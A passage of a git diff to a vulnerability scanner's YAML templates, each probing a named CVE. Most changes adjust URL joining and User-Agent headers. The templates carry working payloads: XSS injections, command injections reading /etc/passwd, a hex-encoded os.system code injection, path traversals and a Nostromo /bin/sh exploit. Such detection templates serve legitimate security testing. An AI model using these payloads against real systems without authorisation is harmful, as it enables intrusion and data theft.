@@ -4,19 +4,18 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- plugins/servlet/Wallboard/
-requests:
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
+ {{.root}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StatusCode() == 200 && RegexSearch("resBody", "(?mi)timeout:\salert\(document\.domain\)")
+ StatusCode() == 200 && StringSearch('response', 'alert(document.domain)') && StringSearch('response', 'AJS.WALLBOARD.')
+
references:
- https://www.cvebase.com/cve/2018/20824
diff --git a/cves/jira-xss-cve-2020-9344.yaml b/cves/jira-xss-cve-2020-9344.yaml
index fbd87b5..12fb6b1 100644
--- a/cves/jira-xss-cve-2020-9344.yaml
+++ b/cves/jira-xss-cve-2020-9344.yaml
@@ -4,46 +4,23 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
-requests:
- - method: GET
- url: >-
- {{.root}}plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "")
- - method: GET
- url: >-
- {{.root}}plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "")
- - method: GET
- url: >-
- {{.root}}plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "")
+replicate:
+ ports: '8080'
+ prefixes: 'jira, wiki, confluence'
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ {{.root}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "")
+ StatusCode() == 200 && StringSearch('body', '') && StringSearch('body', 'jira.subversion-plus')
references:
- https://www.cvebase.com/cve/2020/9344
diff --git a/cves/jolokia-xss-cve-2018-1000129.yaml b/cves/jolokia-xss-cve-2018-1000129.yaml
index 89af44e..3837f3b 100644
--- a/cves/jolokia-xss-cve-2018-1000129.yaml
+++ b/cves/jolokia-xss-cve-2018-1000129.yaml
@@ -4,20 +4,23 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- - endpoint: |
- jolokia/
- api/jolokia/
-requests:
+ - vul: |
+ /jolokia/
+ /monitoring/json/
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}read?mimeType=text/html
+ {{.root}}{{.vul}}read?mimeType=text/html
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeader", "text/html")
+ StatusCode() == 200 && StringSearch("resHeaders", 'Content-Type: text/html') && StringSearch("body", '')
+
references:
- https://www.cvebase.com/cve/2018/1000129
diff --git a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
index 9fa12a2..bbec54e 100644
--- a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
+++ b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
@@ -4,21 +4,24 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
-
-variables:
- - endpoint: |
- api/timelion/run
-requests:
+ - root: "{{.BaseURL}}"
+
+replicate:
+ ports: '5601'
+ prefixes: 'kibana'
+
+requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/api/timelion/run
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ - Content-Type: "application/json; charset=utf-8"
+ body: |
+ {"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "seriesList") && StringSearch("resHeaders", "Content-Type: application/json")
+ StatusCode() == 200 && StringSearch("response", "seriesList") && StringSearch("resHeaders", "application/json")
references:
- https://www.cvebase.com/cve/2019/7609
diff --git a/cves/kong-api-improper-authorization-cve-2020-11710.yaml b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
index 0931e98..3d02e8c 100644
--- a/cves/kong-api-improper-authorization-cve-2020-11710.yaml
+++ b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
index 7ee4fa1..e4563dd 100644
--- a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
+++ b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/linuxki-rce-cve-2020-7209.yaml b/cves/linuxki-rce-cve-2020-7209.yaml
index b25b1ac..7e86576 100644
--- a/cves/linuxki-rce-cve-2020-7209.yaml
+++ b/cves/linuxki-rce-cve-2020-7209.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
+ {{.root}}/{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/lotus-domino-info-leak-cve-2005-2428.yaml b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
index d9cd776..775b717 100644
--- a/cves/lotus-domino-info-leak-cve-2005-2428.yaml
+++ b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
@@ -4,13 +4,13 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
redirect: false
url: >-
- {{.root}}names.nsf/People?OpenView
+ {{.root}}/names.nsf/People?OpenView
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml b/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml
index 1998425..2e7c7e7 100644
--- a/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml
+++ b/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}index.php/catalogsearch/advanced/result/?name=e
+ {{.root}}/index.php/catalogsearch/advanced/result/?name=e
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/magento-magmi-xss-cve-2017-7391.yaml b/cves/magento-magmi-xss-cve-2017-7391.yaml
index f928e9b..534d8c2 100644
--- a/cves/magento-magmi-xss-cve-2017-7391.yaml
+++ b/cves/magento-magmi-xss-cve-2017-7391.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C
+ {{.root}}/{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
index b486076..3660401 100644
--- a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
+++ b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
+ {{.root}}/{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/mida-eframework-rce-cve-2020-15920.yaml b/cves/mida-eframework-rce-cve-2020-15920.yaml
index 7d00c51..c50ea35 100644
--- a/cves/mida-eframework-rce-cve-2020-15920.yaml
+++ b/cves/mida-eframework-rce-cve-2020-15920.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
+ {{.root}}/{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/mobileiron-rce-cve-2020-15505.yaml b/cves/mobileiron-rce-cve-2020-15505.yaml
index 965a1b3..67db3b8 100644
--- a/cves/mobileiron-rce-cve-2020-15505.yaml
+++ b/cves/mobileiron-rce-cve-2020-15505.yaml
@@ -14,7 +14,7 @@ requests:
- method: POST
redirect: false
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Content-Type: x-application/hessian
diff --git a/cves/ms-sharepoint-rce-cve-2020-1147.yaml b/cves/ms-sharepoint-rce-cve-2020-1147.yaml
index 2a97c08..9cf3d84 100644
--- a/cves/ms-sharepoint-rce-cve-2020-1147.yaml
+++ b/cves/ms-sharepoint-rce-cve-2020-1147.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D
+ {{.root}}/{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/ms-sharepoint-rce-cve-2020-16952.yaml b/cves/ms-sharepoint-rce-cve-2020-16952.yaml
index dfdbb28..579531a 100644
--- a/cves/ms-sharepoint-rce-cve-2020-16952.yaml
+++ b/cves/ms-sharepoint-rce-cve-2020-16952.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}
+ {{.root}}/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/netsweeper-code-injection-cve-2020-13167.yaml b/cves/netsweeper-code-injection-cve-2020-13167.yaml
index 2287608..d85bd9d 100644
--- a/cves/netsweeper-code-injection-cve-2020-13167.yaml
+++ b/cves/netsweeper-code-injection-cve-2020-13167.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,8 +12,8 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
- {{.root}}{{.endpoint}}out
+ {{.root}}/{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
+ {{.root}}/{{.endpoint}}out
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
diff --git a/cves/nextjs-path-traversal-cve-2020-5284.yaml b/cves/nextjs-path-traversal-cve-2020-5284.yaml
index dd55d9b..c9393d8 100644
--- a/cves/nextjs-path-traversal-cve-2020-5284.yaml
+++ b/cves/nextjs-path-traversal-cve-2020-5284.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}_next/static/../server/pages-manifest.json
+ {{.root}}/{{.endpoint}}_next/static/../server/pages-manifest.json
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml
index 83d42d5..86495e6 100644
--- a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml
+++ b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/json
diff --git a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml
index 4e0bb69..997246d 100644
--- a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml
+++ b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
diff --git a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
index 37fc18a..8738dae 100644
--- a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
+++ b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
@@ -4,13 +4,13 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}
+ {{.root}}/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
diff --git a/cves/nodejs-path-traversal-cve-2017-14849.yaml b/cves/nodejs-path-traversal-cve-2017-14849.yaml
index 78d7f51..753c8f2 100644
--- a/cves/nodejs-path-traversal-cve-2017-14849.yaml
+++ b/cves/nodejs-path-traversal-cve-2017-14849.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}/etc/passwd
+ {{.root}}/{{.endpoint}}/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/nodejs-path-traversal-cve-2018-3714.yaml b/cves/nodejs-path-traversal-cve-2018-3714.yaml
index fcc6e56..8aa587a 100644
--- a/cves/nodejs-path-traversal-cve-2018-3714.yaml
+++ b/cves/nodejs-path-traversal-cve-2018-3714.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}../../../../../etc/passwd
+ {{.root}}/{{.endpoint}}../../../../../etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/nostromo-rce-cve-2019-16278.yaml b/cves/nostromo-rce-cve-2019-16278.yaml
index 77f3935..6e2becc 100644
--- a/cves/nostromo-rce-cve-2019-16278.yaml
+++ b/cves/nostromo-rce-cve-2019-16278.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: POST
url: >-
- {{.root}}.%0d./.%0d./.%0d./.%0d./bin/sh
+ {{.root}}/.%0d./.%0d./.%0d./.%0d./bin/sh
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
body: >-
diff --git a/cves/nuxeo-ssti-cve-2018-16341.yaml b/cves/nuxeo-ssti-cve-2018-16341.yaml
index 8e9da37..a0b5330 100644
--- a/cves/nuxeo-ssti-cve-2018-16341.yaml
+++ b/cves/nuxeo-ssti-cve-2018-16341.yaml
@@ -10,7 +10,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml
+ {{.root}}//nuxeo/login.jsp/pwn${1199128+7}.xhtml
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/odoo-lfi-cve-2018-15640.yaml b/cves/odoo-lfi-cve-2018-15640.yaml
index 556bb12..6487b5b 100644
--- a/cves/odoo-lfi-cve-2018-15640.yaml
+++ b/cves/odoo-lfi-cve-2018-15640.yaml
@@ -16,7 +16,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- X-Requested-With: XMLHttpRequest
diff --git a/cves/olimpoks-xss-cve-2020-16270.yaml b/cves/olimpoks-xss-cve-2020-16270.yaml
index c9460f8..8500fe9 100644
--- a/cves/olimpoks-xss-cve-2020-16270.yaml
+++ b/cves/olimpoks-xss-cve-2020-16270.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/
+ {{.root}}/{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/openfire-ssrf-cve-2019-18394.yaml b/cves/openfire-ssrf-cve-2019-18394.yaml
index cc7ec96..fcef9aa 100644
--- a/cves/openfire-ssrf-cve-2019-18394.yaml
+++ b/cves/openfire-ssrf-cve-2019-18394.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?host=burpcollaborator.net
+ {{.root}}/{{.endpoint}}?host=burpcollaborator.net
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/openschool-xss-cve-2019-14696.yaml b/cves/openschool-xss-cve-2019-14696.yaml
index 2cebed1..fabb695 100644
--- a/cves/openschool-xss-cve-2019-14696.yaml
+++ b/cves/openschool-xss-cve-2019-14696.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+ {{.root}}/{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml
index 5defa11..d08d8e1 100644
--- a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml
+++ b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
+ {{.root}}/{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml
index 0d401ce..d3374dd 100644
--- a/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml
+++ b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/oracle-sgd-xss-cve-2018-19439.yaml b/cves/oracle-sgd-xss-cve-2018-19439.yaml
index 9ec3b18..4b90161 100644
--- a/cves/oracle-sgd-xss-cve-2018-19439.yaml
+++ b/cves/oracle-sgd-xss-cve-2018-19439.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?=&windowTitle=AdministratorHelpWindow> 
+